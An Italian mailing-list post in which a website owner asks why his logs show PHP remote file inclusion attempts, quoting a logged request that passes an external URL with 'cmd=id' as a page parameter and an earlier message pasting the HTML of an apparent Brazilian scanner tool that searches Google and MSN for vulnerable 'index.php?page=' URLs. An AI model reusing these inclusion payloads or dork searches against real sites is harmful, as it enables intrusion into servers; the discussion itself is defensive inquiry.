continuo ad avere nei miei log una roba di sto tipo
/index.php?m=news&titolo=Censura_nella_sfera_informatica_italiana&id=
http://busca.uol.com.br/uol/index.html?&cmd=id
id dovrebbe essere un numero e non quella schifezza
(id=
http://busca.uol.com.br/uol/index.html)
inoltre viene aggiunto un &cmd=id che non è affatto previsto nel mio
script php
qualcuno viene sul sito e passa sti parametri alle mie pagine...
ma xkè? non riesco a capire... il potenziale pericolo?
dai gente smanettateci un po sopra :)
NeCoSi ha scritto:
> dai log del sito geekplace.org ho letto uno strano log
> si tratta di un php injection.
>
> una cosa del tipo:
> index.php?modulo=http//sito.com/script.php
>
> seguendo quel link si trova quanto segue
> se qualcuno ha voglia e sa fare una ricerca per capire di cosa si tratta
> sarebbe interessante capire cosa succede in rete
>
> da quel che ho notato è una sorta di motore di ricerca su
> busca.uol.com.br ma non sono sicuro, forse sto prendendo un abbaglio io...
> grazie, ciao
>
>
>
>
>
>
> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"><html><head>
> <meta http-equiv="Content-Type" content="text/html;
> charset=iso-8859-1">
> <meta name="Generator" content="AoD">
> <title>Scanning...</title>
> </head><body
> onload="window.location='scan.php?id=35&sites=213.140.17.107-124622112306.txt';">Checking...
> [34] -
> http://www.darkreading.com/document.asp?doc_id=110363&f_src=http://busca.uol.com.br/uol/index.html?&cmd=id
> - [Bug <b>OFF</b>]</body>
> </html>
>
>
>
>
> <body
> onload="window.location='scan.php?id=0&sites=213.140.17.107-125047112306.txt';">
> Aguarde... este processo pode levar alguns minutos.<br>
>
>
>
> http://www.jaskiela.de/html/images/logos/.x/scan.php?id=39&sites=213.140.17.107-125047112306.txt
>
>
>
>
>
>
>
> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
> <html><head>
> <meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
> <meta http-equiv="Content-Language" content="pt-br">
>
> <title>Scan v1.5.2</title><script type="text/javascript">
> function go() {
> var q = document.busca.q.value;
> if (q == '') {
> alert("Coloque todos os campos");
> return false;
> } else
> {
> if (document.mec.R1[0].checked)
> {
> window.location='google.php?q='+q;
> } else if (document.mec.R1[1].checked)
> {
> window.location='msn.php?q='+q;
> }
> return false;
> }
> }
> function show() {
> if (document.mec.R1[0].checked)
> {
> document.getElementById('exemplos').innerHTML =
> 'allinurl:index.php?page=';
> } else if (document.mec.R1[1].checked)
> {
> document.getElementById('exemplos').innerHTML =
> 'index.php?page=';
> }
> }
>
> </script></head>
>
>
>
>
> <body style="font-family: 'Lucida Console';" onload="show()">
>
> <div align="center">
> <center>
>
> <table border="0" cellspacing="1" height="74" width="400">
> <tbody><tr>
> <td height="19" width="400">
> <form method="post" action="#" style="margin: 0pt;"
> onsubmit="return go();" name="busca">
> <p style="margin: 2px; font-size: 12px;">Busca: <input
> name="q" size="31" style="border: 1px solid rgb(0, 0, 0); font-family:
> 'Lucida Console'; font-size: 12px;" type="text"> <input value="Start"
> name="B1" style="border: 1px solid rgb(0, 0, 0); font-family: 'Lucida
> Console'; font-size: 12px;" type="submit"></p>
> </form>
> </td>
> </tr>
>
> <tr>
> <td style="border-top: 1px solid rgb(0, 0, 0); border-bottom: 1px
> solid rgb(0, 0, 0); font-size: 12px;" height="18" width="400"><p
> style="margin: 2px;">Mecanismos > <a id="exemplos" style="color:
> rgb(255, 0, 0);"></a></p></td>
> </tr>
> <tr>
> <td height="19" width="400">
> <form method="post" action="#" style="margin: 0pt;" name="mec">
> <p style="margin: 2px; font-size: 12px;"><input value="V1"
> checked="checked" name="R1" onclick="show();" type="radio">Google</p>
>
> <p style="margin: 2px; font-size: 12px;"><input name="R1"
> value="V2" onclick="show();" type="radio">Search MSN</p>
> </form>
> </td>
> </tr>
> </tbody></table>
> </center>
> </div>
>
> </body></html>
>
>
> ------------------------------------------------------------------------
>
> _______________________________________________
> Hackmeeting mailing list
> Hackmeeting@???
> https://www5.autistici.org/mailman/listinfo/hackmeeting
>
--
Attualmente mi aggiro per
http://GeekPlace.org
E Preferisco ricevere posta crittografata.
ID: 0x855C6C8C sul server: pgp.mit.edu
"Il fatto che un'opinione sia ampiamente condivisa, non è affatto una prova che non sia completamente assurda. Anzi, considerata la stupidità della maggioranza degli uomini, è più probabile che un'opinione diffusa sia cretina anziché sensata."
Bertrand Russell
-----BEGIN GEEK CODE BLOCK-----
Version: 3.12
GCS/CM/IT a-- C++ L U+++ L++ W+++ PS+++ PE- PGP++ !tv G
------END GEEK CODE BLOCK------